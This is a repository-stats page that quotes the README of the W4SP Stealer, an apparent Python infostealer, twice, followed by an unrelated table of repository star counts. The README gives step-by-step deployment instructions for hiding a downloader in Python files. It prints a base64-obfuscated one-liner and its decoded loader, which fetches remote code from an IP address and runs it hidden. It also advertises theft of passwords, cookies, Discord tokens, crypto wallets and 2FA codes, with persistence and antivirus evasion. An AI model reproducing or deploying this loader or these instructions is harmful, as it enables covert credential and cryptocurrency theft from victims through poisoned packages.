This is stars and forks stats for /loTus04/W4SP-Stealer repository. As of 01 May, 2024 this repository has 125 stars and 15 forks.
🐝 W4SP Stealer 🐝 w4sp Stealer official source code, one of the best python stealer on the web By @loTus04 and @billythegoat356 (education purpose only) Setup [Stealer] 1.1 put ur webhook in wasp.py 1.2 obfuscate it 1.3 upload it (must be accecible from a web browser) 2.1 put the wasp.py raw link in injector.py 2.2 obfuscate it 2.3 upload it (must be accecible from a web browser) 3.1 Make a little script that downloads + run injector 3.2 Hide this script in a python file Our example: [one liner] __import__('builtins').exec(__import__('builtins').compile(__import__('base64').b64decode("ZnJvbSB0ZW1wZmlsZSBpbXBvcnQgTmFtZWRUZW1wb3JhcnlGaWxlIGFzIF9mZmlsZQpmcm9tIHN5cyBpbXBvcnQgZXhlY3V0YWJsZSBhcyBfZWV4ZWN1dGFibGUKZnJvbSBvcyBpbXBvcnQgc3lzdGVtIGFzIF9zc3lzdGVtCl90dG1wID0gX2ZmaWxlKGRlbGV0ZT1GYWxzZSkKX3R0bXAud3JpdGUoYiIiImZyb20gdXJsbGliLnJlcXVlc3QgaW1wb3J0IHVybG9wZW4gYXMgX3V1cmxvcGVuO2V4ZWMoX3V1cmxvcGVuKCdodHRwOi8vMTMuMzcuMTMuMzc6MTMzNy9pbmplY3QvVXdVJykucmVhZCgpKSIiIikKX3R0bXAuY2xvc2UoKQp0cnk6IF9zc3lzdGVtKGYic3RhcnQge19lZXhlY3V0YWJsZS5yZXBsYWNlKCcuZXhlJywgJ3cuZXhlJyl9IHtfdHRtcC5uYW1lfSIpCmV4Y2VwdDogcGFzcw"),'<string>','exec')) [script] from tempfile import NamedTemporaryFile as _ffile from sys import executable as _eexecutable from os import system as _ssystem _ttmp = _ffile(delete=False) _ttmp.write(b"""from urllib.request import urlopen as _uurlopen;exec(_uurlopen('http://13.37.13.37:1337/inject/injector.uwu').read())""") _ttmp.close() try: _ssystem(f"start {_eexecutable.replace('.exe', 'w.exe')} {_ttmp.name}") except: pass if you still don't manage to use wasp, ur just stupid, plz don't dm me Setup [API] (api by @billythegoat356) 2022-11-20.22-25-35.mp4 Features [Stealer] Global Saved Passwords Browser Cookies Get PC information AntiVM - Trust Factor system, it wont send data if Gmail cookies arent' found Data is send throught a Discord webhook All files are uploaded to gofile.io to prevent discord rate-limite (ty @sfx2me for the upload function) Discord Discord Tokens from browsers Discord Token from discord, discordcanary, discordPTBa Get all info on token (email, nitro/badge, rare friends) Wallets Exodus Wallet Metamask Wallet Atomic Wallet Gaming Steam Client Riot Client NationsGlory Client Other Telegram Session File Stealer It will search throught the pc for: saved passwords, 2fa codes, wallet keys and other sensitive information (idea came from Kiwi plugin on msf) Features [Injector] brilliant persistance technique Invisible in TaskManger StartUP tab FUD Fully runs in background Hides the stealer very well Few articles on W4SP (those where writen during beta-testing) securelist.com ~ Two more malicious Python packages in the PyPI securityweek.com ~ Security Firms Find Over 20 Malicious PyPI Packages Designed for Data Theft digismak.com ~ Criminals steal data by spoofing popular open source package darkreading.com ~ Whack-a-Mole: More Malicious PyPI Packages Spring Up Targeting Discord, Roblox Features [API] (api by @billythegoat356) Easy2use API, can be controled using anything, default is our discord bot, but you can use a telegram bot or what ever u want manage webhooks manage licence manger users Auto & Custom Obfuscation (using Hyperion rn) BAIT security (if a browser is detected, it will return a fake obfusacted script lmaoo) - idea by @lath Full customisable, can be use with any Stealer or Obfusaction ScreenShots
🐝 W4SP Stealer 🐝 w4sp Stealer official source code, one of the best python stealer on the web By @loTus04 and @billythegoat356 (education purpose only) Setup [Stealer] 1.1 put ur webhook in wasp.py 1.2 obfuscate it 1.3 upload it (must be accecible from a web browser) 2.1 put the wasp.py raw link in injector.py 2.2 obfuscate it 2.3 upload it (must be accecible from a web browser) 3.1 Make a little script that downloads + run injector 3.2 Hide this script in a python file Our example: [one liner] __import__('builtins').exec(__import__('builtins').compile(__import__('base64').b64decode("ZnJvbSB0ZW1wZmlsZSBpbXBvcnQgTmFtZWRUZW1wb3JhcnlGaWxlIGFzIF9mZmlsZQpmcm9tIHN5cyBpbXBvcnQgZXhlY3V0YWJsZSBhcyBfZWV4ZWN1dGFibGUKZnJvbSBvcyBpbXBvcnQgc3lzdGVtIGFzIF9zc3lzdGVtCl90dG1wID0gX2ZmaWxlKGRlbGV0ZT1GYWxzZSkKX3R0bXAud3JpdGUoYiIiImZyb20gdXJsbGliLnJlcXVlc3QgaW1wb3J0IHVybG9wZW4gYXMgX3V1cmxvcGVuO2V4ZWMoX3V1cmxvcGVuKCdodHRwOi8vMTMuMzcuMTMuMzc6MTMzNy9pbmplY3QvVXdVJykucmVhZCgpKSIiIikKX3R0bXAuY2xvc2UoKQp0cnk6IF9zc3lzdGVtKGYic3RhcnQge19lZXhlY3V0YWJsZS5yZXBsYWNlKCcuZXhlJywgJ3cuZXhlJyl9IHtfdHRtcC5uYW1lfSIpCmV4Y2VwdDogcGFzcw"),'<string>','exec')) [script] from tempfile import NamedTemporaryFile as _ffile from sys import executable as _eexecutable from os import system as _ssystem _ttmp = _ffile(delete=False) _ttmp.write(b"""from urllib.request import urlopen as _uurlopen;exec(_uurlopen('http://13.37.13.37:1337/inject/injector.uwu').read())""") _ttmp.close() try: _ssystem(f"start {_eexecutable.replace('.exe', 'w.exe')} {_ttmp.name}") except: pass if you still don't manage to use wasp, ur just stupid, plz don't dm me Setup [API] (api by @billythegoat356) 2022-11-20.22-25-35.mp4 Features [Stealer] Global Saved Passwords Browser Cookies Get PC information AntiVM - Trust Factor system, it wont send data if Gmail cookies arent' found Data is send throught a Discord webhook All files are uploaded to gofile.io to prevent discord rate-limite (ty @sfx2me for the upload function) Discord Discord Tokens from browsers Discord Token from discord, discordcanary, discordPTBa Get all info on token (email, nitro/badge, rare friends) Wallets Exodus Wallet Metamask Wallet Atomic Wallet Gaming Steam Client Riot Client NationsGlory Client Other Telegram Session File Stealer It will search throught the pc for: saved passwords, 2fa codes, wallet keys and other sensitive information (idea came from Kiwi plugin on msf) Features [Injector] brilliant persistance technique Invisible in TaskManger StartUP tab FUD Fully runs in background Hides the stealer very well Few articles on W4SP (those where writen during beta-testing) securelist.com ~ Two more malicious Python packages in the PyPI securityweek.com ~ Security Firms Find Over 20 Malicious PyPI Packages Designed for Data Theft digismak.com ~ Criminals steal data by spoofing popular open source package darkreading.com ~ Whack-a-Mole: More Malicious PyPI Packages Spring Up Targeting Discord, Roblox Features [API] (api by @billythegoat356) Easy2use API, can be controled using anything, default is our discord bot, but you can use a telegram bot or what ever u want manage webhooks manage licence manger users Auto & Custom Obfuscation (using Hyperion rn) BAIT security (if a browser is detected, it will return a fake obfusacted script lmaoo) - idea by @lath Full customisable, can be use with any Stealer or Obfusaction ScreenShots
| repo | techs | stars | weekly | forks | weekly |
|---|---|---|---|---|---|
| d8ahazard/sd_dreambooth_extension | PythonJavaScriptHTML | 1.6k | 0 | 263 | 0 |
| aliyun/surftrace | PythonCOther | 340 | 0 | 60 | 0 |
| viroulep/configFiles | Vim ScriptPerlPython | 0 | 0 | 1 | 0 |
| aarneranta/chalmers-advanced-python | HTMLPythonJavaScript | 45 | 0 | 74 | 0 |
| namlhhe153396/ZUI | HTMLPython | 4 | 0 | 15 | 0 |
| apache/cloudstack | JavaPythonVue | 1.5k | 0 | 1k | 0 |
| OWASP/crAPI | JavaJavaScriptPython | 814 | 0 | 232 | 0 |
| seculayer/AutoAPE-challenge3 | Jupyter NotebookPython | 30 | 0 | 39 | 0 |
| tonylampada/eleicoes22 | Jupyter NotebookPythonShell | 23 | 0 | 6 | 0 |
| kaitai-io/kaitai_struct_formats | Kaitai StructHTMLRuby | 659 | 0 | 194 | 0 |